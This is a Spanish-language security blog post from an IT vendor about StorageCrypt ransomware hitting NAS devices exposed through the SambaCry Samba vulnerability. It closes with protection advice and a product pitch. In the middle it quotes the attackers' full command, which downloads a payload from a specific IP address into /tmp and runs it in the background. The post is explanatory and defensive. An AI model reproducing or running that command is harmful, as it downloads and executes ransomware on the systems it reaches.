Dispositivos NAS, vulnerables a Ransomware StorageCrypt.
¡Solicita tu auditoría WiFi empresarial!Click aquí
  • (55) 5219 8656
  • info@realnet.com.mx
Dispositivos NAS, vulnerables a Ransomware StorageCrypt. Por: Miguel Martinez

 

 

 

 

 

No solo las PC´s son objetivo de los ciberdelincuentes, también las NAS son centro de esfuerzo de los hackers.

Recientemente, se ha descubierto una amenaza llamada StorageCrypt ha comenzado a afectar a estos dispositivos, sobre todo a los que aún son vulnerables a SambaCry, logrando el cifrado de la información dejándola inaccesible.

Los usuarios han comenzado a reportar que de un día para otro, sus archivos han sido cifrados. Adjunto, se encuentra una nota con las instrucciones para poder recuperar la información. La victima debe pagar entre 2 y 4 Bitcoins, es decir, alrededor de $360,000 MXN Y $720,000 MXN.

Como siempre lo hemos remondado, nunca realices el pago del rescate, o estaríamos alimentando más esta industria y no es 100% seguro el retorno de tu información.

Para los que desconocen la vulnerabilidad SambaCry, esta es una breve explicación.

SambaCry es un fallo de seguridad que está vinculado al servicio Samba de los sistemas operativos GNU/Linux. Si se utiliza de forma satisfactoria, el atacante dispondría de acceso a una terminal que permitiría el copiado de los archivos y la ejecución de comandos en los dispositivos afectados.

En el caso que nos ocupa. Los ciberdelincuentes están utilizando el siguiente comando:

wget -O /tmp/apaceha http://45.76.102.45/sambacry && chmod +x /tmp/apaceha &&nohup /tmp/apaceha >/dev/null 2>&1 &

Es decir, realiza la descarga de un archivo llamado SambaCry que se almacena con el nombre de apaceha, almacenándolo en la carpeta /tmp del dispositivo. Posteriormente, lo ejecuta y comienza el cifrado de la información.

Como Proteger mi NAS

Si el fabricante no da una solución, el usuario tiene una solución.

Para garantizar que nuestro dispositivo no se vea afectado, tendremos que aislarlo de Internet. Es decir, que a través de la IP pública de nuestro router no sea accesible a través del puerto de ningún servicio. De esta forma, podemos utilizar el equipo como hasta el momento y sin poner en peligro la información almacenada en él.

La mejor forma de protegerse ante Ransomware es sin duda, contar con un respaldo secuendario o bien contar con una solución que te de la

Backup Gurú con unas antivirus capaz de detectar el movimiento de la información en tiempo real y detiene la actividad maliciosa; así como realizar copias de seguridad constantes sin afectar las operaciones diarias de la organización.

Conoce más de nuestra solución, contáctanos: https://goo.gl/qMeFci

fuente: bleepingcomputer

 

 

8
Ver todos los artículos en el siguiente enlace Todos los artículos